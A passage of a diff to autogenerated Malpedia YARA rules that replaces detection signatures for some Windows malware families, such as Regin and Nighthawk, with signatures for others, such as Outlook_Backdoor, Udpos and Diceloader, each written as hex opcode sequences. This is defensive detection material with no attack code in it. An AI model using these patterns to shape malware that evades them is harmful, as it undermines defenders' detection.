c7459c65007800 c745a065000000 83f817 0f82140c0000 83bd58ffffff08 8d8544ffffff } + $sequence_6 = { 51 50 51 ffb580feffff 8d8d5cffffff } + $sequence_7 = { 51 ffb580feffff 8d8d5cffffff e8???????? 838d78feffff06 8d8de4feffff 83bdf8feffff08 } + $sequence_8 = { 8b0c8570804100 8a043b 03ce 8b75dc 03cb 43 } + $sequence_9 = { 2bc2 3bc8 760e b8ffffff7f befeffff7f 03c0 } condition: - 7 of them and filesize <327680 + 7 of them and filesize <212992 } -rule MALPEDIA_Win_Xbtl_Auto : FILE +rule MALPEDIA_Win_Tinymet_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "7372571c-d52e-5b5b-bd42-81e7e356cc7e" + id = "a6e31398-6f4b-5407-9dd6-cb73f522ca46" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xbtl" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.xbtl_auto.yar#L1-L130" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinymet" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.tinymet_auto.yar#L1-L104" license_url = "N/A" - logic_hash = "b45bdfe7ddb3c3bebb25f685acba4274921aebf8fbd081dea272d3bf592a2a7b" + logic_hash = "08c0faf51104b44743d7b565703ff1ffe8a5a90a54db8ef44d5f821b9f74a23a" score = 75 quality = 75 tags = "FILE" @@ -164240,32 +167018,30 @@ rule MALPEDIA_Win_Xbtl_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ffd7 50 ffd3 8bd8 85f6 7406 8d45e8 } - $sequence_1 = { 99 8bd8 8bc1 99 33f6 0bf0 3135???????? } - $sequence_2 = { 8d45ec 8d95f0fdffff e8???????? 8b85d4fdffff 56 56 6a03 } - $sequence_3 = { 85d2 782a 895dfc 8b4d08 0fb63c0a 8b460c 0345fc } - $sequence_4 = { 0fb67808 89948dc0feffff 0fb65007 c1e208 0bd7 } - $sequence_5 = { 83c41c 8d4c2410 51 ffd7 8b442434 8b4c2428 8b1d???????? } - $sequence_6 = { 8bd6 897c2420 2bd0 0fb708 66890c02 83c002 } - $sequence_7 = { 03048de0c04200 eb02 8bc2 f6402480 7417 e8???????? c70016000000 } - $sequence_8 = { 81e600ff00ff c1c208 81e2ff00ff00 0bf2 897018 8b491c } - $sequence_9 = { 8b5708 40 83c410 894704 3bc2 7e16 8d0412 } + $sequence_0 = { 68???????? e9???????? 8d45ec 6a10 50 } + $sequence_1 = { 8bf0 83feff 751b 68???????? e9???????? ff15???????? } + $sequence_2 = { 56 ff15???????? 8b4df8 03d9 85c0 75df 8bc7 } + $sequence_3 = { 6a00 ff35???????? ff35???????? e8???????? 83c40c a3???????? ffd0 } + $sequence_4 = { 8bec 81eca4010000 8d855cfeffff 53 } + $sequence_5 = { 6a3e 59 f7f1 8a821c104000 88041f 47 3bfe } + $sequence_6 = { 741d 48 7416 68???????? e8???????? } + $sequence_7 = { 56 57 6a5c ff30 e8???????? } condition: - 7 of them and filesize <401408 + 7 of them and filesize <57344 } -rule MALPEDIA_Win_Flusihoc_Auto : FILE +rule MALPEDIA_Win_Stowaway_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "78da62a5-c798-5ed3-b0d2-4c7f68889a1b" + id = "e2cf60b5-46e1-5dce-b54e-4eae51e51190" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.flusihoc" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.flusihoc_auto.yar#L1-L168" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stowaway" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.stowaway_auto.yar#L1-L110" license_url = "N/A" - logic_hash = "9c728cded699d733d4c529cd8d0e45713d382315b1100a325978e10da75fc22d" + logic_hash = "ba9de78202a4b50e7d737f5edb3449679cab84813a913aa4817b5b87ab2181a8" score = 75 quality = 75 tags = "FILE" @@ -164279,38 +167055,31 @@ rule MALPEDIA_Win_Flusihoc_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8bec 83e4f8 81ece40b0000 a1???????? } - $sequence_1 = { 53 56 57 6a40 8d442428 6a00 50 } - $sequence_2 = { 50 f3a5 c684246402000000 e8???????? } - $sequence_3 = { a1???????? 33c4 89842450160000 53 56 8b7508 57 } - $sequence_4 = { 52 ffd6 6a0a ff15???????? } - $sequence_5 = { 7507 80864d01000004 83f822 7506 } - $sequence_6 = { ffd3 8b442410 6aff 50 ff15???????? } - $sequence_7 = { 50 f3a5 c684246401000000 e8???????? 83c40c } - $sequence_8 = { 6a00 50 c744242c44000000 e8???????? } - $sequence_9 = { 83f822 7506 fe8e42010000 3d14010000 7506 } - $sequence_10 = { 8b8c245c160000 5f 5e 5b 33cc 33c0 e8???????? } - $sequence_11 = { ff15???????? 8b4c2410 51 ffd6 8b542414 52 ffd6 } - $sequence_12 = { 3d68010000 7505 fe06 fe4e17 83f834 7503 fe4e18 } - $sequence_13 = { 51 6a00 ff15???????? 8d95f4feffff 52 6806000200 } - $sequence_14 = { 6804010000 8d85f8feffff 50 6a01 } - $sequence_15 = { 68???????? 6802000080 ff15???????? 85c0 752f 8b8df4feffff } + $sequence_0 = { 8b07 09c0 743c 8b5f04 } + $sequence_1 = { 09c0 7407 8903 83c304 ebe1 } + $sequence_2 = { 50 54 6a04 53 57 ffd5 8d879f010000 } + $sequence_3 = { 89f9 57 48 f2ae 55 } + $sequence_4 = { 8d879f010000 80207f 8060287f 58 50 } + $sequence_5 = { 95 8a07 47 08c0 74dc 89f9 57 } + $sequence_6 = { 76e8 77e8 78e8 79e8 } + $sequence_7 = { 8a7cbe46 a3???????? 4e fb b501 } + $sequence_8 = { 78e8 79e8 7ae8 ce f67be8 7ce8 7de8 } condition: - 7 of them and filesize <319488 + 7 of them and filesize <8003584 } -rule MALPEDIA_Win_Beatdrop_Auto : FILE +rule MALPEDIA_Win_Fct_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "b3142cf9-1fa2-58bd-9f49-d91bf2cf24b1" + id = "2b1f29a9-1362-5741-a18b-c3a100da706f" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.beatdrop" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.beatdrop_auto.yar#L1-L124" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fct" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.fct_auto.yar#L1-L127" license_url = "N/A" - logic_hash = "171eb025ab1384be132ed16b4793a3dd033a6c86c2974208fbbb41bec30e49af" + logic_hash = "d2be9c8f676646ff8bb82d16a11f73bdaff1325b5ad55ea7931b7cc2d022d940" score = 75 quality = 75 tags = "FILE" @@ -164324,32 +167093,32 @@ rule MALPEDIA_Win_Beatdrop_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? 4c89f1 e8???????? 4c8d0571aaffff } - $sequence_1 = { 4733bc84000c0000 4189c1 4589f0 41c1e918 4433bebc000000 41c1e810 } - $sequence_2 = { 0fb6c0 413394b5000c0000 c1eb18 33552c 4133948500040000 4489c0 } - $sequence_3 = { 4189d3 0fb6ce 41c1e818 41c1eb18 478b4c8500 4589f8 438b5c9d00 } - $sequence_4 = { 4189d3 c1ea18 41c1eb10 335e78 418b1494 4333948c000c0000 450fb6db } - $sequence_5 = { 4489cb 334610 41c1eb18 450fb6d2 0fb6df 4333849400040000 } - $sequence_6 = { 41c1e818 4189cf 4489d1 478b0484 4733848c000c0000 4589d1 } - $sequence_7 = { 488b3d???????? 89d8 4989ce 4989d5 488b0d???????? 4c89c6 4c89cd } - $sequence_8 = { 498344241010 eb11 498d4c2408 e8???????? eb05 49ff442418 } - $sequence_9 = { e8???????? 4885c0 752c 4c8b4b08 41b813000000 } + $sequence_0 = { 83e801 0f8595010000 c745e438324100 e9???????? 894de0 c745e438324100 e9???????? } + $sequence_1 = { c3 c705????????80554100 b001 c3 68???????? e8???????? c70424???????? } + $sequence_2 = { e9???????? 8b1f 8d049d58634100 8b30 } + $sequence_3 = { 8bc6 83e03f 6bc838 894de0 8b049d50614100 f644082801 7469 } + $sequence_4 = { 6a04 e8???????? 83bd48fdffff08 8d8d34fdffff 8d45d8 } + $sequence_5 = { c70021000000 eb44 c745e002000000 c745e444324100 8b4508 8bcf 8b7510 } + $sequence_6 = { 50 8b04bd50614100 ff743018 ff15???????? 85c0 7404 b001 } + $sequence_7 = { 56 33f6 8b8650614100 85c0 740e 50 e8???????? } + $sequence_8 = { 660fd60f 8d7f08 8b048d84514000 ffe0 f7c703000000 7413 } + $sequence_9 = { 68???????? c68524fdffff00 8d4dd8 ffb524fdffff 6a01 e8???????? } condition: - 7 of them and filesize <584704 + 7 of them and filesize <204800 } -rule MALPEDIA_Win_Regin_Auto : FILE +rule MALPEDIA_Win_Outlook_Backdoor_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "ce7821ca-cfed-5ada-bd4c-3b99c9cf64f9" + id = "10b67e6b-fced-54a6-8f30-b2a0d20f49ea" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.regin" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.regin_auto.yar#L1-L120" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.outlook_backdoor" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.outlook_backdoor_auto.yar#L1-L131" license_url = "N/A" - logic_hash = "985ecd1548d174f4606bb21325679aedf195f3d6056cd99e3d5f01bd16dfaa46" + logic_hash = "373fe304abbc2faa8be0b7ba3a307d5b5d4cb0051b5dde767cca54332adde2f8" score = 75 quality = 75 tags = "FILE" @@ -164363,32 +167132,32 @@ rule MALPEDIA_Win_Regin_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 49 8363f000 48 8d0504230000 49 8943d8 } - $sequence_1 = { 48 89442438 b800210000 c7442430204e0000 89442428 } - $sequence_2 = { 85c0 740c 8b05???????? 39442460 7405 } - $sequence_3 = { c1e802 41 ffc0 48 8d4c2470 41 } - $sequence_4 = { 44 8bc1 48 8b0d???????? ff15???????? } - $sequence_5 = { 48 89442448 48 89442450 b82375f1ba } - $sequence_6 = { 33c0 48 83c428 c3 48 83ec28 33c9 } - $sequence_7 = { 0f45df 8bc3 48 8b5c2448 } - $sequence_8 = { 84c0 44 8d7304 0f45f8 8d4302 44 84c0 } - $sequence_9 = { 48 8bfb 8bc7 48 8b5c2430 48 } + $sequence_0 = { ff753c 53 68e9fd0000 ffd6 8d4d00 894568 e8???????? } + $sequence_1 = { ff10 8b4c2408 ff74240c 8d04c8 8b4804 85c9 740b } + $sequence_2 = { c9 c20800 56 8bf7 e8???????? 8d771c e8???????? } + $sequence_3 = { c745e01f000130 895d0c ff15???????? 8b450c 8945f0 895dfc 33c9 } + $sequence_4 = { 6898000000 e8???????? 59 8945ec c645fc01 } + $sequence_5 = { f6455404 740e 836554fb 57 56 8d4dbc e8???????? } + $sequence_6 = { c3 57 6a2c e8???????? 8bf8 59 85ff } + $sequence_7 = { 5f 5e 8d4302 5b c3 53 8bd9 } + $sequence_8 = { 50 e8???????? 834d1004 f6451002 740f 836510fd } + $sequence_9 = { e8???????? 83ec38 56 57 8bf1 8b4604 33ff } condition: - 7 of them and filesize <49152 + 7 of them and filesize <2912256 } -rule MALPEDIA_Win_Hardrain_Auto : FILE +rule MALPEDIA_Win_Pirpi_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "97910df3-cc32-519a-be42-e878c516a607" + id = "98537945-bca9-5f78-aa80-688498d88ff3" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hardrain" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.hardrain_auto.yar#L1-L123" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pirpi" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.pirpi_auto.yar#L1-L122" license_url = "N/A" - logic_hash = "e6beb234b33f52448f8a2b08bdea562633ec321b73d43e884a2e68853ad4b784" + logic_hash = "b10391fa85a6d93cb62abde2610054ffc017de9bf6b1bef0a98b13168e41c382" score = 75 quality = 75 tags = "FILE" @@ -164402,32 +167171,32 @@ rule MALPEDIA_Win_Hardrain_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 66c74424380000 f3ab 66ab b981000000 33c0 } - $sequence_1 = { 51 56 89542414 8944241c e8???????? 83c410 85c0 } - $sequence_2 = { 8b7c241c 6685ff 7509 5f 83c8ff 5e 83c410 } - $sequence_3 = { ff15???????? 85c0 7eca 8d442430 } - $sequence_4 = { 51 8bce e8???????? 85c0 7427 6a14 } - $sequence_5 = { 68b4000000 52 50 e8???????? } - $sequence_6 = { 8d842484000000 68???????? 50 e8???????? 8d8c248c000000 6800040000 8d942490040000 } - $sequence_7 = { 83c418 c3 33c0 33c9 68b4000000 89442408 } - $sequence_8 = { ff15???????? 8b0e 85c9 7406 8b11 6a01 ff12 } - $sequence_9 = { 81ec0c010000 8b842414010000 8b942418010000 57 89442404 b942000000 } + $sequence_0 = { e8???????? 33ff 8945f4 85c0 897dfc } + $sequence_1 = { 46 3bf7 72eb c6043b00 5d 8bc7 } + $sequence_2 = { 50 ff15???????? 83c414 8d8c2434010000 } + $sequence_3 = { 8bd8 83c408 85db 7515 68???????? 50 } + $sequence_4 = { 83c404 85ed 7513 53 ff15???????? 5f 5e } + $sequence_5 = { 56 ff15???????? 56 8be8 ff15???????? 33d2 3bea } + $sequence_6 = { 33c0 f2ae f7d1 49 83f920 7350 } + $sequence_7 = { 03d8 f3a4 c6042b00 eb6e } + $sequence_8 = { 55 c744242018000000 e8???????? 83f87a 753b 55 8b2d???????? } + $sequence_9 = { 89442414 7516 ff15???????? 894504 c744241000000000 e9???????? } condition: - 7 of them and filesize <368640 + 7 of them and filesize <327680 } -rule MALPEDIA_Win_Parasite_Http_Auto : FILE +rule MALPEDIA_Win_Udpos_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "8396c4fe-e904-583d-8bc2-2a1b61b79bee" + id = "49a8c6d9-3919-52d8-b9a1-bc6d433f2d9f" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.parasite_http" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.parasite_http_auto.yar#L1-L128" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.udpos" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.udpos_auto.yar#L1-L127" license_url = "N/A" - logic_hash = "37851542b45d72ed626359d2a060741c909807319056a1d140e5557e76485a87" + logic_hash = "ffccd56d9879c5a40153befe0b99e30b88fecb63ad13af5b9ec71c40ee069e0c" score = 75 quality = 75 tags = "FILE" @@ -164441,32 +167210,32 @@ rule MALPEDIA_Win_Parasite_Http_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 57 b900040000 e8???????? 8bf8 85ff 0f848a000000 56 } - $sequence_1 = { 50 33c0 895dfc 53 53 } - $sequence_2 = { 884df2 8d4dbc 66895dbe 668955c0 66895dc4 668945ce 66c745ec5669 } - $sequence_3 = { e8???????? 59 85db 7407 8bcb e8???????? 8b45f0 } - $sequence_4 = { 6a36 6689460a 58 6a34 6689460e 58 57 } - $sequence_5 = { e8???????? b9???????? 8bd8 e8???????? 33d2 8bcb } - $sequence_6 = { 57 8bf9 b9???????? e8???????? b9???????? 8bf0 e8???????? } - $sequence_7 = { 57 e8???????? 03c6 50 52 } - $sequence_8 = { 740f 8d4dfc 51 51 51 50 } - $sequence_9 = { 53 ffd0 8bcf e8???????? 8bce e8???????? 8bcb } + $sequence_0 = { 8bc8 23cf 0bf1 8b4dfc 03d6 0353fc 8bf0 } + $sequence_1 = { 8b4dfc 83c404 5f 8bc3 33cd } + $sequence_2 = { 52 e8???????? 83c418 833d????????00 0f8596000000 8d85ccf3ffff 50 } + $sequence_3 = { 8888f8e84000 40 ebe6 ff35???????? ff15???????? 85c0 7513 } + $sequence_4 = { 7e1e 8d575c 85f6 7517 6639944dfcfdffff 7508 be01000000 } + $sequence_5 = { 51 e8???????? a1???????? 8b3d???????? 83c418 } + $sequence_6 = { 7e0d 83f809 7e08 a1???????? 8b7024 56 8d4d9c } + $sequence_7 = { e8???????? 68f4010000 6a00 8d8dc8fcffff 51 e9???????? } + $sequence_8 = { ffd6 8d953cffffff 52 8d85e0f8ffff 50 ffd6 } + $sequence_9 = { 40 3bc3 7cef 8b85a0feffff 50 e8???????? } condition: - 7 of them and filesize <147456 + 7 of them and filesize <163840 } -rule MALPEDIA_Win_Mim221_Auto : FILE +rule MALPEDIA_Win_Unidentified_039_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "e2e82536-e29b-53d1-8c95-30ff68363ca9" + id = "79803854-9c28-5ee4-826a-7f1227d74ba5" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mim221" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mim221_auto.yar#L1-L132" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_039" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_039_auto.yar#L1-L126" license_url = "N/A" - logic_hash = "bd7d2b077259a6edc03c8b758f8bad3f5a42643cb60c61d80165934010c8f5e6" + logic_hash = "58c8fb21d6ae978d62ed7528cfbdb8da381c56d520ca5623fbbc73c80d3173d3" score = 75 quality = 75 tags = "FILE" @@ -164480,32 +167249,32 @@ rule MALPEDIA_Win_Mim221_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 90 4883bc244001000008 720d 488b8c2428010000 e8???????? 4881c420020000 415e } - $sequence_1 = { c68424b400000061 4488a424b5000000 c68424b600000064 c68424b70000006c 4488ac24b8000000 c68424b900000046 c68424ba00000072 } - $sequence_2 = { 488b8c2400010000 e8???????? e9???????? 4889442420 4d8bcc 4c8b8424f8010000 488bd6 } - $sequence_3 = { 57 488bc4 4883ec58 48c7442420feffffff 498bd8 488bf9 } - $sequence_4 = { 668944243a 668944243c 668944243e 6689442440 488d542420 488bcf 66c74424420000 } - $sequence_5 = { 3d5a290000 7307 b801000000 eb0a 3d39380000 1bc0 83c003 } - $sequence_6 = { 66c7803effffff4c00 66b85300 6689842418010000 66c784241a0100004100 6644899c241c010000 66c784241e0100004900 66c78424200100007300 } - $sequence_7 = { 4157 4881ec88000000 33ff 498be8 488bf1 4c8bfa } - $sequence_8 = { 3d401f0000 7309 8d7b20 448d6b18 eb1b 3db8240000 730b } - $sequence_9 = { 488d8c24ca000000 e8???????? c684249003000044 c68424910300008b c684249203000001 c684249303000044 c684249403000039 } + $sequence_0 = { b8???????? e8???????? 8365fc00 8365cc00 c745dce7600000 c745ec89640000 } + $sequence_1 = { c745f00b090000 c745f089000000 8975c0 c745f4b76e0000 c745fc9e540000 c745f8a7600000 } + $sequence_2 = { c74530284c0000 c7453425120000 c745281f480000 c74538136b0000 c74520825d0000 c7451c84360000 8b4530 } + $sequence_3 = { 69c9de3f0000 33c1 8945dc 8b4510 8b4d0c 3bc8 7d0c } + $sequence_4 = { 8bec 51 51 c745f81d2d0000 c745f8d33a0000 c745fc9a790000 } + $sequence_5 = { c745d0e5720000 8b45d0 8b4dd4 0fafc1 8b4dd8 8b55dc } + $sequence_6 = { 6bc01f c1e704 83c30c 03fa 33d2 } + $sequence_7 = { 69c0295a0000 8945e4 e8???????? c745e0f9750000 c745f0b56c0000 c745ec29110000 } + $sequence_8 = { 8d45f4 64a300000000 c3 6a00 6a01 ff74240c } + $sequence_9 = { c745e863430000 8b45e4 59 8b4df8 23c1 8b4de8 81e931570000 } condition: - 7 of them and filesize <471040 + 7 of them and filesize <262144 } -rule MALPEDIA_Win_Contopee_Auto : FILE +rule MALPEDIA_Win_Diceloader_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "77374f1e-6c89-5026-9b9e-741c43271a9e" + id = "29011295-3bc8-5840-8c7d-e823af0d9069" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.contopee" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.contopee_auto.yar#L1-L123" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.diceloader" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.diceloader_auto.yar#L1-L125" license_url = "N/A" - logic_hash = "887c3d1e6d8d0ed992ba95d9f863595a093876d8864d3c96b3a6d6d4a8e08fbb" + logic_hash = "3c776f38a1a79f5ecd47a0499d8c206a83999319aa99b844edf38b2b9ae751b8" score = 75 quality = 75 tags = "FILE" @@ -164519,32 +167288,32 @@ rule MALPEDIA_Win_Contopee_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c3 8bac244c020000 55 6a00 } - $sequence_1 = { 83c41c eb35 8b5614 8b442430 6a00 6aff 42 } - $sequence_2 = { 6880000000 50 8d8e6a050000 6880000000 51 } - $sequence_3 = { 66896c240c 8d842414020000 50 57 ff15???????? } - $sequence_4 = { 7510 ff15???????? 5f 5d 5b 81c4dc040000 c3 } - $sequence_5 = { 8bf8 ebc8 ff15???????? 8bf8 ebd1 5f } - $sequence_6 = { 7432 6a0f 51 50 e8???????? 8bf0 } - $sequence_7 = { 8bd8 8b4608 83f802 8b44242c 0f858e000000 eb04 8b7c2418 } - $sequence_8 = { 68???????? 51 ff15???????? 8b84243c020000 8d542428 52 50 } - $sequence_9 = { 52 e8???????? 83c430 5f 5e } + $sequence_0 = { 7419 e8???????? 8bf0 83f8fe 0f840a010000 83f8ff } + $sequence_1 = { 75cf 488325????????00 488d0d3a220000 448905???????? c705????????01000000 ff15???????? 488325????????00 } + $sequence_2 = { 75e5 448d4301 41b9983a0000 488d1daa2a0000 8bcf 488bd3 ff15???????? } + $sequence_3 = { 8b0491 4903c5 498907 33c9 eb2a } + $sequence_4 = { 498b7318 498be3 5f c3 4053 4883ec20 33db } + $sequence_5 = { 7453 33d2 458d460e 488d4c2420 e8???????? 0fb7ce } + $sequence_6 = { 8bf0 83f8fe 0f840a010000 83f8ff 0f8406010000 4533ff 3bf3 } + $sequence_7 = { 4c8d4820 ba05000000 44894024 448bc1 c740e808000000 8d4afe e8???????? } + $sequence_8 = { e8???????? 498bd5 488d0dea1f0000 e8???????? } + $sequence_9 = { 8d4860 e8???????? 488bcd 488bf8 895808 } condition: - 7 of them and filesize <180224 + 7 of them and filesize <41984 } -rule MALPEDIA_Win_Micrass_Auto : FILE +rule MALPEDIA_Win_Lyposit_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "4db1798a-2c39-50c7-84da-46ea64acd353" + id = "bce51077-57cf-5adb-b910-01a9e65c59f7" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.micrass" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.micrass_auto.yar#L1-L121" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lyposit" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.lyposit_auto.yar#L1-L127" license_url = "N/A" - logic_hash = "9dffdea8c321d05076908df0f614e54842a8e7b97f4db09cebeac9dcb66ebdaa" + logic_hash = "6d3a7a695e65723557f6178bebcb83673702ff3e28dbc2c0dd967dcfab1ce86b" score = 75 quality = 75 tags = "FILE" @@ -164558,32 +167327,32 @@ rule MALPEDIA_Win_Micrass_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 59 89442424 8d442408 6a50 } - $sequence_1 = { 66890c45c4cc4000 40 ebe8 33c0 8945e4 3d01010000 7d0d } - $sequence_2 = { 8dbdccfdffff a5 a5 a5 a5 } - $sequence_3 = { 6a06 89430c 8d4310 8d8984194000 5a 668b31 } - $sequence_4 = { 8d85f8afffff 6a00 50 e8???????? 68???????? 57 e8???????? } - $sequence_5 = { 53 8985b83fffff 8d85c03fffff 57 50 89bddc9fffff } - $sequence_6 = { 56 b9???????? 8bf2 2bc8 2bf0 8a1401 } - $sequence_7 = { 8985e4fbffff 6a05 59 be???????? } - $sequence_8 = { 50 c744244801010000 e8???????? 59 50 89442414 } - $sequence_9 = { 8bcb e8???????? 59 837e4400 57 bf???????? } + $sequence_0 = { ff510c 3bc3 0f8cf1000000 57 6a40 ffd6 8945dc } + $sequence_1 = { ff74240c 50 e8???????? a3???????? 59 } + $sequence_2 = { 33f6 8975d8 8975fc b9???????? e8???????? 50 e8???????? } + $sequence_3 = { 6a01 e8???????? 83c40c 397d10 7413 ff7510 } + $sequence_4 = { ff15???????? 8bf8 8975d8 6a04 803e55 7506 8d4601 } + $sequence_5 = { 83c40c 83f801 0f8556010000 015f3c 295f58 807f6c00 } + $sequence_6 = { 0f8479010000 8bd8 8b5768 03573c 8b4760 33f6 } + $sequence_7 = { 29775c 0175fc 837df801 894750 8b475c 743e } + $sequence_8 = { e8???????? 8945c4 8d4de0 51 ff75d0 56 } + $sequence_9 = { 8bfe e8???????? 33c0 eb0f 6a08 6a40 ffd3 } condition: - 7 of them and filesize <163840 + 7 of them and filesize <466944 } -rule MALPEDIA_Win_Nighthawk_Auto : FILE +rule MALPEDIA_Win_Slickshoes_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "046bd4e8-fb79-5079-9bf0-a25651c08679" + id = "86c839b6-e5b0-5f50-b2eb-341682181175" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nighthawk" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.nighthawk_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.slickshoes" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.slickshoes_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "f6ef6ce19d4a02a93b282663ef6578b1629bc3c4125b3116c888694bf074ff3d" + logic_hash = "a30adc8e9bcf8ed13fec8919d0e4389d7fc505e3cf19302dcab25ec63fa5bcd2" score = 75 quality = 75 tags = "FILE" @@ -164597,32 +167366,32 @@ rule MALPEDIA_Win_Nighthawk_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8983a8000000 4c397d0f 720f 488b4df7 4885c9 7406 e8???????? } - $sequence_1 = { ff15???????? 48897b48 48837b3808 720e 488b4b20 4885c9 7405 } - $sequence_2 = { 740d 0f104030 448d7701 0f11442420 498d4f30 ff15???????? 4585f6 } - $sequence_3 = { 4c8bd2 488d354b95f5ff 4183e20f 488bfa 492bfa 488bda 4c8bc1 } - $sequence_4 = { 7419 e8???????? 488b5310 41b801000000 488bc8 e8???????? eba5 } - $sequence_5 = { ff15???????? 85c0 0f844a040000 448b4510 4c897588 4c897598 458d7e0f } - $sequence_6 = { 8b02 418901 890a e9???????? 418b08 418b03 418900 } - $sequence_7 = { 4903ca 4b890c01 eb34 6683f803 7509 4923ce 46011401 } - $sequence_8 = { 488d542470 488d4d20 e8???????? 488bd0 488d4d40 e8???????? 90 } - $sequence_9 = { 4c894c2448 4c89642440 4c89642438 4489642430 48894c2428 4889442420 4533c9 } + $sequence_0 = { e9???????? 81c204000000 55 bd2a3bff63 81e5fb17be7f e9???????? 57 } + $sequence_1 = { e9???????? f7d2 50 e9???????? b87073f77f f7d8 0d90f1fe6f } + $sequence_2 = { 81f61f000000 2d01000000 6681ebb987 81f704000000 b800020000 89fa b800000000 } + $sequence_3 = { e9???????? b804000000 01c1 58 81c104000000 e9???????? 83c404 } + $sequence_4 = { e9???????? b931bbb979 81e13b81af7f e9???????? 5a 01d1 81e91dadf56e } + $sequence_5 = { ff3424 5f 83c404 50 54 58 0504000000 } + $sequence_6 = { e9???????? bd40d86e7e 81c74b047f7d 29ef 81ef4b047f7d 5d 81f75adb6482 } + $sequence_7 = { 